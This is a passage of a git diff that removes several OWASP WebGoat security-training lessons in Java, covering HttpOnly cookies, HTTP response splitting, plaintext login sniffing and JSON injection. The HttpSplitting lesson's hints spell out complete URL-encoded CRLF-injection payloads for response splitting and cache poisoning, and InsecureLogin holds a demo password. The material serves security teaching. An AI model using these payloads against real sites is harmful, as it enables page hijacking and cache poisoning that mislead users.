- * - * For details, please see http://webgoat.github.io - */ -public class HttpOnly extends LessonAdapter -{ - - public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com") - .addElement( - new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0) - .setVspace(0)); - - private final static Integer DEFAULT_RANKING = new Integer(125); - - private final static String UNIQUE2U = "unique2u"; - - private final static String HTTPONLY = "httponly"; - - private final static String HTTPONLY_VALUE = "httponly_value"; - - private final static String ACTION = "action"; - - private final static String READ = "Read Cookie"; - - private final static String WRITE = "Write Cookie"; - - private final static String READ_RESULT = "read_result"; - - private boolean httpOnly = false; - - private boolean readSuccess = false; - - private boolean writeSuccess = false; - - private String original = "undefined"; - - /** - * Gets the title attribute of the EmailScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("HTTPOnly Test"); - } - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - /** - * Description of the Method - * - * @param s - * Description of the Parameter - * @return Description of the Return Value - */ - - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - String action = null; - String http = null; - - http = s.getRequest().getParameter(HTTPONLY); - action = s.getRequest().getParameter(ACTION); - - if (http != null) - { - httpOnly = Boolean.parseBoolean(http); - } - - if (httpOnly) - { - // System.out.println("HttpOnly: Setting HttpOnly for cookie"); - setHttpOnly(s); - } - else - { - // System.out.println("HttpOnly: Removing HttpOnly for cookie"); - removeHttpOnly(s); - } - - if (action != null) - { - if (action.equals(READ)) - { - handleReadAction(s); - } - else if (action.equals(WRITE)) - { - 
handleWriteAction(s); - } - else - { - // s.setMessage("Invalid Request. Please try again."); - } - } - - try - { - ec.addElement(makeContent(s)); - } catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); - } - - return (ec); - } - - /** - * DOCUMENT ME! - * - * @return DOCUMENT ME! - */ - protected Category getDefaultCategory() - { - return Category.XSS; - } - - /** - * Gets the hints attribute of the EmailScreen object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints.add("Read the directions and try out the buttons."); - return hints; - } - - private String createCustomCookieValue() - { - String value = null; - byte[] buffer = null; - MessageDigest md = null; - BASE64Encoder encoder = new BASE64Encoder(); - - try - { - md = MessageDigest.getInstance("SHA"); - buffer = new Date().toString().getBytes(); - - md.update(buffer); - value = encoder.encode(md.digest()); - original = value; - - } catch (Exception e) - { - e.printStackTrace(); - } - - return value; - } - - private void setHttpOnly(WebSession s) - { - String value = createCustomCookieValue(); - HttpServletResponse response = s.getResponse(); - String cookie = s.getCookie(UNIQUE2U); - - if (cookie == null || cookie.equals("HACKED")) - { - response.setHeader("Set-Cookie", UNIQUE2U + "=" + value + "; HttpOnly"); - original = value; - } - else - { - response.setHeader("Set-Cookie", UNIQUE2U + "=" + cookie + "; HttpOnly"); - original = cookie; - } - } - - private void removeHttpOnly(WebSession s) - { - String value = createCustomCookieValue(); - HttpServletResponse response = s.getResponse(); - String cookie = s.getCookie(UNIQUE2U); - - if (cookie == null || cookie.equals("HACKED")) - { - response.setHeader("Set-Cookie", UNIQUE2U + "=" + value + ";"); - original = value; - } - else - { - response.setHeader("Set-Cookie", UNIQUE2U + "=" + cookie + ";"); - original = cookie; - } - } - - 
private ElementContainer makeContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - Element r = null; - Element hidden_r = null; - Table t = null; - TR tr = null; - Form f = null; - - ec.addElement(new StringElement(getJavaScript())); - - f = new Form(); - - t = new Table(); - t.setWidth(500); - - tr = new TR(); - - tr.addElement(new TD(new StringElement("Your browser appears to be: " + getBrowserType(s)))); - t.addElement(tr); - - tr = new TR(); - t.addElement(tr); - - tr = new TR(); - - tr.addElement(new TD(new StringElement("Do you wish to turn HTTPOnly on?"))); - - tr.addElement(new TD(new StringElement("Yes"))); - - if (httpOnly == true) - { - r = new Input(Input.RADIO, HTTPONLY_VALUE, "True").addAttribute("Checked", "true"); - } - else - { - r = new Input(Input.RADIO, HTTPONLY_VALUE, "True").addAttribute("onClick", "document.form.httponly.click();"); - hidden_r = new Input(Input.SUBMIT, HTTPONLY, "True").addAttribute("style", "visibility:hidden"); - } - - tr.addElement(new TD(r)); - - tr.addElement(new TD(new StringElement("No"))); - - if (httpOnly == false) - { - r = new Input(Input.RADIO, HTTPONLY_VALUE, "False").addAttribute("Checked", "false"); - } - else - { - r = new Input(Input.RADIO, HTTPONLY_VALUE, "False").addAttribute("onClick", "document.form.httponly.click();"); - hidden_r = new Input(Input.SUBMIT, HTTPONLY, "False").addAttribute("style", "visibility:hidden"); - } - - tr.addElement(new TD(r)); - tr.addElement(hidden_r); - - r = new Input(Input.HIDDEN, READ_RESULT, ""); - tr.addElement(r); - - t.addElement(tr); - - /* - * tr.addElement(new TD(new StringElement("Status: " ))); t.addElement(tr); - * if(httpOnly == true) { tr.addElement(new TD(new StringElement("
On
"))); } else { tr.addElement(new TD(new StringElement ("
Off
"))); } t.addElement(tr); t.addElement(new TR(new TD(new - * StringElement("
")))); - */f.addElement(t); - - t = new Table(); - tr = new TR(); - - r = new Input(Input.SUBMIT, ACTION, READ).addAttribute("onclick", "myAlert();"); - tr.addElement(new TD(r)); - - r = new Input(Input.SUBMIT, ACTION, WRITE).addAttribute("onclick", "modifyAlert();"); - tr.addElement(new TD(r)); - t.addElement(tr); - - f.addElement(t); - ec.addElement(f); - - return ec; - } - - private void handleReadAction(WebSession s) - { - - String displayed = s.getRequest().getParameter(READ_RESULT); - - if (httpOnly == true) - { - if (displayed.indexOf(UNIQUE2U) != -1) - { - s.setMessage("FAILURE: Your browser did not enforce the HTTPOnly flag properly for the '" + UNIQUE2U - + "' cookie. It allowed direct client side read access to this cookie."); - } - else - { - s.setMessage("SUCCESS: Your browser enforced the HTTPOnly flag properly for the '" + UNIQUE2U - + "' cookie by preventing direct client side read access to this cookie."); - if (writeSuccess) - { - if (!this.isCompleted(s)) - { - makeSuccess(s); - readSuccess = false; - writeSuccess = false; - } - } - else - { - if (!this.isCompleted(s)) - { - s.setMessage("Now try to see if your browser protects write access to this cookie."); - readSuccess = true; - } - } - } - } - else if (displayed.indexOf(UNIQUE2U) != -1) - { - s.setMessage("Since HTTPOnly was not enabled, the '" + UNIQUE2U - + "' cookie was displayed in the alert dialog."); - } - else - { - s.setMessage("Since HTTPOnly was not enabled, the '" + UNIQUE2U - + "' cookie should have been displayed in the alert dialog, but was not for some reason. 
" - + "(This shouldn't happen)"); - } - } - - private void handleWriteAction(WebSession s) - { - String hacked = s.getCookie(UNIQUE2U); - - if (httpOnly == true) - { - if (!original.equals(hacked)) - { - s - .setMessage("FAILURE: Your browser did not enforce the write protection property of the HTTPOnly flag for the '" - + UNIQUE2U + "' cookie."); - s.setMessage("The " + UNIQUE2U + " cookie was successfully modified to " + hacked - + " on the client side."); - } - else - { - s - .setMessage("SUCCESS: Your browser enforced the write protection property of the HTTPOnly flag for the '" - + UNIQUE2U + "' cookie by preventing client side modification."); - if (readSuccess) - { - if (!this.isCompleted(s)) - { - makeSuccess(s); - readSuccess = false; - writeSuccess = false; - } - } - else - { - if (!this.isCompleted(s)) - { - s.setMessage("Now try to see if your browser protects read access to this cookie."); - writeSuccess = true; - } - } - } - } - else if (!original.equals(hacked)) - { - s.setMessage("Since HTTPOnly was not enabled, the browser allowed the '" + UNIQUE2U - + "' cookie to be modified on the client side."); - } - else - { - s.setMessage("Since HTTPOnly was not enabled, the browser should have allowed the '" + UNIQUE2U - + "' cookie to be modified on the client side, but it was not for some reason. 
" - + "(This shouldn't happen)"); - } - } - - private String getJavaScript() - { - StringBuffer buffer = new StringBuffer(); - - buffer.append("\n"); - - return buffer.toString(); - } - - private String getBrowserType(WebSession s) - { - int offset = -1; - String result = "unknown"; - String browser = s.getHeader("user-agent").toLowerCase(); - - if (browser != null) - { - if (browser.indexOf("firefox") != -1) - { - browser = browser.substring(browser.indexOf("firefox")); - - offset = getOffset(browser); - - result = browser.substring(0, offset); - } - else if (browser.indexOf("msie 6") != -1) - { - result = "Internet Explorer 6"; - } - else if (browser.indexOf("msie 7") != -1) - { - result = "Internet Explorer 7"; - } - else if (browser.indexOf("msie") != -1) - { - result = "Internet Explorer"; - } - else if (browser.indexOf("opera") != -1) - { - result = "Opera"; - } - else if (browser.indexOf("safari") != -1) - { - result = "Safari"; - } - else if (browser.indexOf("netscape") != -1) - { - browser = browser.substring(browser.indexOf("netscape")); - - offset = getOffset(browser); - - result = browser.substring(0, offset); - } - else if (browser.indexOf("konqueror") != -1) - { - result = "Konqueror"; - } - else if (browser.indexOf("mozilla") != -1) - { - result = "Mozilla"; - } - } - - return result; - } - - private int getOffset(String s) - { - int result = s.length(); - - for (int i = 0; i < s.length(); i++) - { - if (s.charAt(i) < 33 || s.charAt(i) > 126) - { - result = i; - break; - } - } - - return result; - } - - public Element getCredits() - { - return super.getCustomCredits("", ASPECT_LOGO); - } -} diff --git a/src/main/java/org/owasp/webgoat/lessons/HttpSplitting.java b/src/main/java/org/owasp/webgoat/lessons/HttpSplitting.java deleted file mode 100644 index 72b61572b..000000000 --- a/src/main/java/org/owasp/webgoat/lessons/HttpSplitting.java +++ /dev/null 
@@ -1,252 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.net.URLDecoder;
-import java.text.DateFormat;
-import java.text.SimpleDateFormat;
-import java.util.*;
-import javax.servlet.http.HttpServletResponse;
-import org.apache.ecs.*;
-import org.apache.ecs.html.*;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects. 
- * - * For details, please see http://webgoat.github.io - * - * @author Sherif Koussa Software Secured - * @created September 30, 2006 - */ - -public class HttpSplitting extends SequentialLessonAdapter -{ - - private final static String LANGUAGE = "language"; - - private final static String REDIRECT = "fromRedirect"; - - private static String STAGE = "stage"; - - public final static A MAC_LOGO = new A().setHref("http://www.softwaresecured.com").addElement(new IMG("images/logos/softwaresecured.gif").setAlt("Software Secured").setBorder(0).setHspace(0).setVspace(0)); - - /** - * Description of the Method - * - * @param s - * Current WebSession - */ - public void handleRequest(WebSession s) - { - // Setting a special action to be able to submit to redirect.jsp - Form form = new Form(s.getRequest().getContextPath() + "/lessons/General/redirect.jsp?" + "Screen=" + String.valueOf(getScreenId()) - + "&menu=" + getDefaultCategory().getRanking().toString(), Form.POST).setName("form").setEncType(""); - - form.addElement(createContent(s)); - - setContent(form); - } - - protected Element doHTTPSplitting(WebSession s) - { - ElementContainer ec = new ElementContainer(); - String lang = null; - - try - { - ec.addElement(createAttackEnvironment(s)); - lang = URLDecoder.decode(s.getParser().getRawParameter(LANGUAGE, ""), "UTF-8"); - - // Check if we are coming from the redirect page - String fromRedirect = s.getParser().getStringParameter("fromRedirect", ""); - - if (lang.length() != 0 && fromRedirect.length() != 0) - { - - - String[] arrTokens = lang.toString().toUpperCase().split("\r\n"); - - // Check if the user ended the first request and wrote the second malicious reply - if (arrTokens.length > 1) - { - HttpServletResponse res = s.getResponse(); - res.setContentType("text/html"); - - StringBuffer msg = new StringBuffer(); - - msg.append("Good Job! 
"); - msg.append("This lesson has detected your successful attack, "); - msg.append("time to elevate your attack to a higher level. "); - msg.append("Try again and add Last-Modified header, intercept"); - msg.append("the reply and replace it with a 304 reply."); - - s.setMessage(msg.toString()); - getLessonTracker(s).setStage(2); - - - //makeSuccess(s); - - } - } - } catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); - } - return (ec); - } - - protected Element createContent(WebSession s) - { - return super.createStagedContent(s); - } - - protected Element doStage1(WebSession s) throws Exception - { - return doHTTPSplitting(s); - } - - protected Element doStage2(WebSession s) throws Exception - { - return doCachePoisining(s); - } - - protected Element createAttackEnvironment(WebSession s) throws Exception - { - ElementContainer ec = new ElementContainer(); - String lang = null; - - if (getLessonTracker(s).getStage() == 1) - { - ec.addElement(new H3("Stage 1: HTTP Splitting:

")); - } - else - { - ec.addElement(new H3("Stage 2: Cache Poisoning:

")); - } - ec.addElement(new StringElement("Search by country : ")); - - lang = URLDecoder.decode(s.getParser().getRawParameter(LANGUAGE, ""), "UTF-8"); - - // add the search by field - Input input = new Input(Input.TEXT, LANGUAGE, lang.toString()); - ec.addElement(input); - - Element b = ECSFactory.makeButton("Search!"); - - ec.addElement(b); - - return ec; - } - - protected Element doCachePoisining(WebSession s) throws Exception - { - ElementContainer ec = new ElementContainer(); - - try - { - s.setMessage("Now that you have successfully performed an HTTP Splitting, now try to poison" - + " the victim's cache. Type 'restart' in the input field if you wish to " - + " to return to the HTTP Splitting lesson.

"); - if (s.getParser().getRawParameter(LANGUAGE, "YOUR_NAME").equals("restart")) - { - getLessonTracker(s).getLessonProperties().setProperty(STAGE, "1"); - return (doHTTPSplitting(s)); - } - - ec.addElement(createAttackEnvironment(s)); - String lang = URLDecoder.decode(s.getParser().getRawParameter(LANGUAGE, ""), "UTF-8"); - String fromRedirect = s.getParser().getStringParameter(REDIRECT, ""); - - if (lang.length() != 0 && fromRedirect.length() != 0) - { - String lineSep = "\r\n"; - String dateStr = lang.substring(lang.indexOf("Last-Modified:") + "Last-Modified:".length(), lang - .indexOf(lineSep, lang.indexOf("Last-Modified:"))); - if (dateStr.length() > 0) - { - Calendar cal = Calendar.getInstance(); - - DateFormat sdf = new SimpleDateFormat("EEE, dd MMM yyyy HH:mm:ss z", Locale.US); - - if (sdf.parse(dateStr.trim()).after(cal.getTime())) - { - makeSuccess(s); - } - } - } - } catch (Exception ex) - { - ec.addElement(new P().addElement(ex.getMessage())); - } - return ec; - } - - protected Category getDefaultCategory() - { - return Category.GENERAL; - } - - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints.add("Enter a language for the system to search by."); - hints.add("Use CR (%0d) and LF (%0a) for a new line in Windows and only LF (%0a) in Linux."); - hints.add("The Content-Length: 0 will tell the server that the first request is over."); - hints.add("A 200 OK message looks like this: HTTP/1.1 200 OK"); - hints.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM
Try: foobar%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0AContent-Length%3A%2047%0D%0A%0D%0A%3Chtml%3EHacked!%3C%2Fhtml%3E
For insight into what this does, use the PHP charset encoder to decode it."); - hints.add("Cache Poisoning starts with including 'Last-Modified' header in the hijacked page and setting it to a future date."); - hints.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM
Try foobar%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202080%2014%3A50%3A18%20GMT%0D%0AContent-Length%3A%2047%0D%0A%0D%0A%3Chtml%3EHacked%20J%3C%2Fhtml%3E"); - hints.add("'Last-Modified' header forces the browser to send a 'If-Modified-Since' header. Some cache servers will take the bait and keep serving the hijacked page"); - hints.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM
Try to intercept the reply and add HTTP/1.1 304 Not Modified0d%0aDate:%20Mon,%2027%20Oct%202030%2014:50:18%20GMT");
- return hints;
-
- }
-
- private final static Integer DEFAULT_RANKING = new Integer(20);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- /**
- * Gets the title attribute of the HelloScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("HTTP Splitting");
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
- }
-
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/InsecureLogin.java b/src/main/java/org/owasp/webgoat/lessons/InsecureLogin.java
deleted file mode 100644
index 0b70447b5..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/InsecureLogin.java
+++ /dev/null
@@ -1,496 +0,0 @@ - -package org.owasp.webgoat.lessons; - -import java.sql.Connection; -import java.sql.PreparedStatement; -import java.sql.ResultSet; -import java.util.ArrayList; -import java.util.List; -import org.apache.ecs.Element; -import org.apache.ecs.ElementContainer; -import org.apache.ecs.StringElement; -import org.apache.ecs.html.A; -import org.apache.ecs.html.BR; -import org.apache.ecs.html.Div; -import org.apache.ecs.html.Input; -import org.apache.ecs.html.Option; -import org.apache.ecs.html.Select; -import org.apache.ecs.html.TD; -import org.apache.ecs.html.TR; -import org.apache.ecs.html.Table; -import org.apache.ecs.xhtml.style; -import org.owasp.webgoat.session.DatabaseUtilities; -import org.owasp.webgoat.session.WebSession; - - -public class InsecureLogin extends SequentialLessonAdapter -{ - - private final static String USER = "clear_user"; - private final static String PASSWORD = "clear_pass"; - private final static String ANSWER = "clear_answer"; - private final static String YESNO = "yesno"; - private final static String PROTOCOL = "protocol"; - - /** - * Description of the Method - * - * @param s - * Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - return super.createStagedContent(s); - } - - @Override - protected Element doStage1(WebSession s) throws Exception - { - String answer = s.getParser().getStringParameter(ANSWER, ""); - if (answer.equals("sniffy")) - { - s.setMessage("You completed Stage 1!"); - getLessonTracker(s).setStage(2); - } - return createMainContent(s); - } - - @Override - protected Element doStage2(WebSession s) throws Exception - { - String protocol = s.getParser().getStringParameter(PROTOCOL, ""); - String yesno = s.getParser().getStringParameter(YESNO, ""); - - if (yesno.equals("No") && protocol.equals("TLS")) - { - makeSuccess(s); - } - - return createMainContent(s); - } - - /** - * Creation of the main content - * - * @param s - * 
@return Element - */ - protected Element createMainContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - try - { - style sty = new style(); - - sty - .addElement("#lesson_wrapper {height: 435px;width: 500px;}#lesson_header {background-image: url(lessons/DBSQLInjection/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}.lesson_workspace {background-image: url(lessons/DBSQLInjection/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;} .lesson_text {height: 240px;width: 460px;padding-top: 5px;} #lesson_buttons_bottom {height: 20px;width: 460px;} #lesson_b_b_left {width: 300px;float: left;} #lesson_b_b_right input {width: 100px;float: right;} .lesson_title_box {height: 20px;width: 420px;padding-left: 30px;} .lesson_workspace { } .lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;} .lesson_text_db {color: #0066FF} #lesson_login {background-image: url(lessons/DBSQLInjection/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;} #lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;} #lesson_search {background-image: url(lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}"); - ec.addElement(sty); - - Div wrapperDiv = new Div(); - wrapperDiv.setID("lesson_wrapper"); - - Div headerDiv = new Div(); - headerDiv.setID("lesson_header"); - - Div workspaceDiv = new Div(); - workspaceDiv.setClass("lesson_workspace"); - - wrapperDiv.addElement(headerDiv); - wrapperDiv.addElement(workspaceDiv); - - ec.addElement(wrapperDiv); - - String user = s.getParser().getStringParameter(USER, ""); - String password = 
s.getParser().getStringParameter(PASSWORD, ""); - if (!(user + password).equals("") && correctLogin(user, password, s)) - { - workspaceDiv.addElement(createSuccessfulLoginContent(s, user)); - } - else - { - workspaceDiv.addElement(createLogInContent()); - } - } catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); - } - - return (ec); - } - - /** - * Create content for logging in - * - * @param ec - */ - private Element createLogInContent() - { - ElementContainer ec = new ElementContainer(); - Div loginDiv = new Div(); - loginDiv.setID("lesson_login"); - - Table table = new Table(); - table.addAttribute("align='center'", 0); - TR tr1 = new TR(); - TD td1 = new TD(); - TD td2 = new TD(); - td1.addElement(new StringElement("Enter your name: ")); - td2.addElement(new Input(Input.TEXT, USER).setValue("Jack").setReadOnly(true)); - tr1.addElement(td1); - tr1.addElement(td2); - - TR tr2 = new TR(); - TD td3 = new TD(); - TD td4 = new TD(); - td3.addElement(new StringElement("Enter your password: ")); - td4.addElement(new Input(Input.PASSWORD, PASSWORD).setValue("sniffy").setReadOnly(true)); - tr2.addElement(td3); - tr2.addElement(td4); - - TR tr3 = new TR(); - TD td5 = new TD(); - td5.setColSpan(2); - td5.setAlign("center"); - - td5.addElement(new Input(Input.SUBMIT, "Submit", "Submit")); - tr3.addElement(td5); - - table.addElement(tr1); - table.addElement(tr2); - table.addElement(tr3); - loginDiv.addElement(table); - ec.addElement(loginDiv); - return ec; - - } - - /** - * Gets the category attribute of the ForgotPassword object - * - * @return The category value - */ - protected Category getDefaultCategory() - { - - return Category.INSECURE_COMMUNICATION; - } - - /** - * Gets the hints attribute of the HelloScreen object - * - * @return The hints value - */ - public List getHints(WebSession s) - { - List hints = new ArrayList(); - - hints.add("Stage 1: Use a sniffer to record " + "the traffic"); - hints.add("Stage 
1: What Protocol does the request use?"); - hints.add("Stage 1: What kind of request is started when " + "you click on the button?"); - hints.add("Stage 1: Take a closer look at the HTTP Post request in " + "your sniffer"); - hints.add("Stage 1: The password field has the name clear_pass"); - - return hints; - } - - private final static Integer DEFAULT_RANKING = new Integer(100); - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - /** - * Gets the title attribute of the HelloScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Insecure Login"); - } - - @Override - public String getInstructions(WebSession s) - { - int stage = getLessonTracker(s).getStage(); - String instructions = ""; - instructions = "For this lesson you need to " + "have a server client setup. Please refer to the" - + "Tomcat Configuration in the Introduction section.

Stage" + stage + ": "; - if (stage == 1) - { - instructions += "In this stage you have to sniff the " - + "password. And answer the question after the login."; - } - if (stage == 2) - { - instructions += "Now you have to change to a secure " + "connection. The URL should start with https:// " - + "If your browser is complaining about the certificate just " - + "ignore it. Sniff again the traffic and answer the" + " questions"; - } - return instructions; - } - - /** - * See if the password and corresponding user is valid - * - * @param userName - * @param password - * @param s - * @return true if the password was correct - */ - private boolean correctLogin(String userName, String password, WebSession s) - { - Connection connection = null; - try - { - connection = DatabaseUtilities.getConnection(s); - String query = "SELECT * FROM user_data_tan WHERE first_name = ? AND password = ?"; - PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - prepStatement.setString(1, userName); - prepStatement.setString(2, password); - - ResultSet results = prepStatement.executeQuery(); - - if ((results != null) && (results.first() == true)) { - - return true; - - } - - } catch (Exception e) - { - e.printStackTrace(); - } finally - { - try - { - if (connection != null) - { - connection.close(); - } - } catch (Exception e) - { - e.printStackTrace(); - } - } - - return false; - - } - - /** - * Create content after a successful login - * - * @param s - * @param ec - */ - private Element createSuccessfulLoginContent(WebSession s, String user) - { - ElementContainer ec = new ElementContainer(); - - String userDataStyle = "margin-top:50px;"; - - Div userDataDiv = new Div(); - userDataDiv.setStyle(userDataStyle); - userDataDiv.addAttribute("align", "center"); - Table table = new Table(); - table.addAttribute("cellspacing", 10); - table.addAttribute("cellpadding", 5); - - table.addAttribute("align", "center"); - 
TR tr1 = new TR(); - TR tr2 = new TR(); - TR tr3 = new TR(); - TR tr4 = new TR(); - tr1.addElement(new TD("Firstname:")); - tr1.addElement(new TD(user)); - - try - { - ResultSet results = getUser(user, s); - results.first(); - - tr2.addElement(new TD("Lastname:")); - tr2.addElement(new TD(results.getString("last_name"))); - - tr3.addElement(new TD("Credit Card Type:")); - tr3.addElement(new TD(results.getString("cc_type"))); - - tr4.addElement(new TD("Credit Card Number:")); - tr4.addElement(new TD(results.getString("cc_number"))); - - } - - catch (Exception e) - { - e.printStackTrace(); - } - table.addElement(tr1); - table.addElement(tr2); - table.addElement(tr3); - table.addElement(tr4); - - userDataDiv.addElement(table); - ec.addElement(userDataDiv); - ec.addElement(createLogoutLink()); - - int stage = getLessonTracker(s).getStage(); - if (stage == 1) - { - ec.addElement(createPlaintextQuestionContent()); - } - else if (stage == 2) - { - ec.addElement(createSSLQuestionContent()); - } - - return ec; - } - - private Element createPlaintextQuestionContent() - { - ElementContainer ec = new ElementContainer(); - Div div = new Div(); - div.addAttribute("align", "center"); - div.addElement(new BR()); - div.addElement(new BR()); - div.addElement("What was the password?"); - div.addElement(new Input(Input.TEXT, ANSWER)); - div.addElement(new Input(Input.SUBMIT, "Submit", "Submit")); - ec.addElement(div); - return ec; - } - - private Element createSSLQuestionContent() - { - ElementContainer ec = new ElementContainer(); - Table selectTable = new Table(); - TR tr1 = new TR(); - TD td1 = new TD(); - TD td2 = new TD(); - TR tr2 = new TR(); - TD td3 = new TD(); - TD td4 = new TD(); - tr1.addElement(td1); - tr1.addElement(td2); - tr2.addElement(td3); - tr2.addElement(td4); - selectTable.addElement(tr1); - selectTable.addElement(tr2); - - Div div = new Div(); - div.addAttribute("align", "center"); - ec.addElement(new BR()); - ec.addElement(new BR()); - - td1.addElement("Is the 
password still transmited in plaintext?"); - Select yesNoSelect = new Select(); - yesNoSelect.setName(YESNO); - Option yesOption = new Option(); - yesOption.addElement("Yes"); - Option noOption = new Option(); - noOption.addElement("No"); - yesNoSelect.addElement(yesOption); - yesNoSelect.addElement(noOption); - td2.addElement(yesNoSelect); - - td3.addElement("Which protocol is used for the transmission?"); - Select protocolSelect = new Select(); - protocolSelect.setName(PROTOCOL); - Option httpOption = new Option(); - httpOption.addElement("HTTP"); - Option tcpOption = new Option(); - tcpOption.addElement("UDP"); - Option ipsecOption = new Option(); - ipsecOption.addElement("IPSEC"); - Option msnmsOption = new Option(); - msnmsOption.addElement("MSNMS"); - Option tlsOption = new Option(); - tlsOption.addElement("TLS"); - protocolSelect.addElement(httpOption); - protocolSelect.addElement(ipsecOption); - protocolSelect.addElement(msnmsOption); - protocolSelect.addElement(tcpOption); - protocolSelect.addElement(tlsOption); - td4.addElement(protocolSelect); - - div.addElement(selectTable); - - div.addElement(new Input(Input.SUBMIT, "Submit", "Submit")); - ec.addElement(div); - return ec; - } - - /** - * Get a user by its name - * - * @param user - * @param s - * @return ResultSet containing the user - */ - private ResultSet getUser(String user, WebSession s) - { - Connection connection = null; - try - { - connection = DatabaseUtilities.getConnection(s); - String query = "SELECT * FROM user_data_tan WHERE first_name = ? 
";
- PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
- ResultSet.CONCUR_READ_ONLY);
- prepStatement.setString(1, user);
-
- ResultSet results = prepStatement.executeQuery();
-
- return results;
-
- } catch (Exception e)
- {
- e.printStackTrace();
- } finally
- {
- try
- {
- if (connection != null)
- {
- connection.close();
- }
- } catch (Exception e)
- {
- e.printStackTrace();
- }
- }
- return null;
-
- }
-
- /**
- * Create a link for logging out
- *
- * @return Element
- */
- private Element createLogoutLink()
- {
- A logoutLink = new A();
- logoutLink.addAttribute("href", getLink() + "&logout=true");
- logoutLink.addElement("Logout");
-
- String logoutStyle = "margin-right:50px; mrgin-top:30px";
- Div logoutDiv = new Div();
- logoutDiv.addAttribute("align", "right");
- logoutDiv.addElement(logoutLink);
- logoutDiv.setStyle(logoutStyle);
-
- return logoutDiv;
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("Created by: Reto Lippuner, Marcel Wirth", new StringElement(""));
- }
-
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/JSONInjection.java b/src/main/java/org/owasp/webgoat/lessons/JSONInjection.java
deleted file mode 100644
index 267c2a335..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/JSONInjection.java
+++ /dev/null
@@ -1,298 +0,0 @@ - -package org.owasp.webgoat.lessons; - -import org.owasp.webgoat.session.WebSession; -import org.apache.ecs.Element; -import org.apache.ecs.ElementContainer; -import org.apache.ecs.StringElement; -import org.apache.ecs.html.Div; -import org.apache.ecs.html.Form; -import org.apache.ecs.html.IMG; -import org.apache.ecs.html.Table; -import org.apache.ecs.html.TR; -import org.apache.ecs.html.TD; -import org.apache.ecs.html.Input; -import org.apache.ecs.html.BR; -import java.io.PrintWriter; -import java.util.List; -import java.util.ArrayList; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. - * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, 